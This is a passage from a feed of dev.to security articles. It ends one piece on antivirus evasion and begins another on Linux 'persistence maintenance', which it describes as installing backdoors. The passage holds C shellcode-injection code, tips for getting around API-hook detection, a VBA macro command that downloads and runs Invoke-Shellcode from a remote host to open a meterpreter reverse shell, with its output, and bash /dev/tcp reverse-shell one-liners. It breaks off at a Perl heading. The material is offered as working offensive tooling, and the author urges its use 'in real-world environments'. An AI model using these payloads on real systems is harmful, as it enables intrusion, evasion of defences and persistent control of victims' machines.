        &lt;span class="n"&gt;PROCESS_INFORMATION&lt;/span&gt; &lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;LPVOID&lt;/span&gt; &lt;span class="n"&gt;lpMalwareBaseAddr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;LPVOID&lt;/span&gt; &lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;HANDLE&lt;/span&gt; &lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;DWORD&lt;/span&gt; &lt;span class="n"&gt;dwExitCode&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;BOOL&lt;/span&gt; &lt;span class="n"&gt;bRet&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;FALSE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="n"&gt;lpMalwareBaseAddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="n"&gt;GetSystemDirectory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_PATH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;_tcscat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s"&gt;calc.exe"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Injection program Name:%S&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="n"&gt;ZeroMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
        &lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;ZeroMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;CreateProcess&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;FALSE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;CREATE_SUSPENDED&lt;/span&gt;
            &lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;bRet&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;VirtualAllocEx&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;
            &lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="n"&gt;MEM_RESERVE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;bRet&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="n"&gt;WriteProcessMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LPVOID&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;lpMalwareBaseAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;CreateRemoteThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LPTHREAD_START_ROUTINE&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="n"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;INFINITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;GetExitCodeProcess&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;dwExitCode&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;TerminateProcess&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;bRet&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;help&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;proc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"%s:[-] start a process and injection shellcode to memory&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;proc&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[])&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;help&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="n"&gt;injection&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ft7e1yz82iur8jxg9dnef.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ft7e1yz82iur8jxg9dnef.png" alt="*Figure 19: Process injection code compilation" width="800" height="389"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;*Figure 19: Process injection code compilation
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpi0ydrr4t4cyqw19cwcp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpi0ydrr4t4cyqw19cwcp.png" alt="Figure 20: Process injection execution" width="799" height="219"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 20: Process injection execution
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzt9kww4yanr0x5rpvxe6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzt9kww4yanr0x5rpvxe6.png" alt="Figure 21: Detection results for process injection" width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 21: Detection results for process injection
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;I shall conclude the injection examples here. Consider the question: how can one circumvent API hooking detection? Function substitution offers one approach. For instance, among the Win32 APIs, there exist numerous alternatives to &lt;code&gt;VirtualAlloc&lt;/code&gt; that can be employed:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fmqwq3se7dnjblw7oyxkb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fmqwq3se7dnjblw7oyxkb.png" alt="Figure 22: Alternative memory allocation functions" width="799" height="464"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 22: Alternative memory allocation functions
  &lt;p&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  0x03 Technique Combinations
&lt;/h2&gt;

&lt;p&gt;We have discussed various techniques, encompassing the &lt;strong&gt;separation&lt;/strong&gt; approach (loaders executing shellcode, &lt;strong&gt;whitelist exploitation&lt;/strong&gt; for malicious execution), as well as &lt;strong&gt;shellcode encoding, encryption, and injection&lt;/strong&gt;. Each technique individually contributes to evasion to some degree; however, employing any single technique in isolation often presents certain &lt;strong&gt;limitations&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The key consideration is &lt;strong&gt;combining&lt;/strong&gt; these techniques to achieve optimal results.&lt;/p&gt;

&lt;p&gt;Here is a particularly effective example:&lt;/p&gt;

&lt;h4&gt;
  
  
  Powershell-Payload-Excel-Delivery
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/" rel="noopener noreferrer"&gt;https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This technique employs &lt;strong&gt;shellcode&lt;/strong&gt; to invoke Graeber's &lt;strong&gt;VBA macro&lt;/strong&gt;, which executes &lt;strong&gt;PowerShell&lt;/strong&gt; (optionally encoded) in memory to achieve persistent backdoor access.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Set objProcess = GetObject("winmgmts:\\" &amp;amp; strComputer &amp;amp; "\root\cimv2:Win32_Process")
        objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force", Null, objConfig, intProcessID
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fz3aihxkjwpa2xk3tdmc3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fz3aihxkjwpa2xk3tdmc3.png" alt="Figure 23: PowerShell payload delivery via Excel" width="799" height="291"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 23: PowerShell payload delivery via Excel
  &lt;p&gt;&lt;/p&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;C:\PS&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Start-Process&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Windows\SysWOW64\notepad.exe&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-WindowStyle&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Hidden&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;C:\PS&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;$Proc&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Get-Process&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;notepad&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;C:\PS&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Invoke-Shellcode&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-ProcessId&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;$Proc&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Id&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Payload&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;windows/meterpreter/reverse_https&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Lhost&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;192.168.30.129&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Lport&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;443&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Verbose&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Requesting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;meterpreter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;payload&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;https://192.168.30.129:443/INITM&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Injecting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;shellcode&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;into&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PID:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;4004&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Injecting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;into&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Wow64&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;process.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Using&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;32-bit&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;shellcode.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Shellcode&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;memory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;reserved&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;at&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;0x03BE0000&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Emitting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;32-bit&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;assembly&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;call&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;stub.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Thread&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;call&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;stub&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;memory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;reserved&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;at&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;0x001B0000&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Shellcode&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;injection&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;complete&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;p&gt;The techniques themselves are static; creativity in their application is paramount. I trust that this article serves as a catalyst for further exploration, encouraging practitioners to combine multiple techniques with ingenuity to achieve their desired outcomes in real-world environments.&lt;/p&gt;

</description>
      <category>shellcode</category>
      <category>cybersecurity</category>
      <category>evasion</category>
      <category>techniques</category>
    </item>
    <item>
      <title>Linux Persistence Maintenance</title>
      <dc:creator>Excalibra</dc:creator>
      <pubDate>Mon, 22 Jun 2026 08:36:46 +0000</pubDate>
      <link>https://dev.to/excalibra/linux-persistence-maintenance-54hj</link>
      <guid>https://dev.to/excalibra/linux-persistence-maintenance-54hj</guid>
      <description>&lt;h2&gt;
  
  
  0X00 On Persistence Maintenance
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F73vrbkgatd4492ruz2m2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F73vrbkgatd4492ruz2m2.png" alt=" " width="800" height="1465"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What is Persistence Maintenance?
&lt;/h3&gt;

&lt;p&gt;We can straightforwardly understand persistence maintenance as the installation of a backdoor on the target. The purpose of persistence maintenance is to ensure that one's privileges are not lost and to maintain continuous control over the target.&lt;/p&gt;

&lt;h2&gt;
  
  
  0X01 Obtaining Initial Access
&lt;/h2&gt;

&lt;p&gt;Linux offers numerous methods for establishing a reverse shell. The primary advantage of a reverse shell is that it often provides a more convenient operational environment; for me personally, the key benefit is command completion. In any case, from a persistence perspective, it facilitates the execution of subsequent actions.&lt;/p&gt;

&lt;p&gt;The ability to obtain a reverse shell depends on the target's environment. It is possible that Bash cannot directly establish a reverse shell, whereas Python might succeed. One must also remain mindful of application whitelisting.&lt;/p&gt;

&lt;p&gt;For the experimental environment, Kali Linux will be used; ensure that a snapshot is taken.&lt;/p&gt;

&lt;h3&gt;
  
  
  Bash
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bash &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&amp;amp; /dev/tcp/10.0.0.1/8080 0&amp;gt;&amp;amp;1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;bash &lt;span class="nt"&gt;-i&lt;/span&gt; 5&amp;lt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;/dev/tcp/host/port 0&amp;gt;&amp;amp;5 1&amp;gt;&amp;amp;5
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Perl
&lt;/h3&gt;



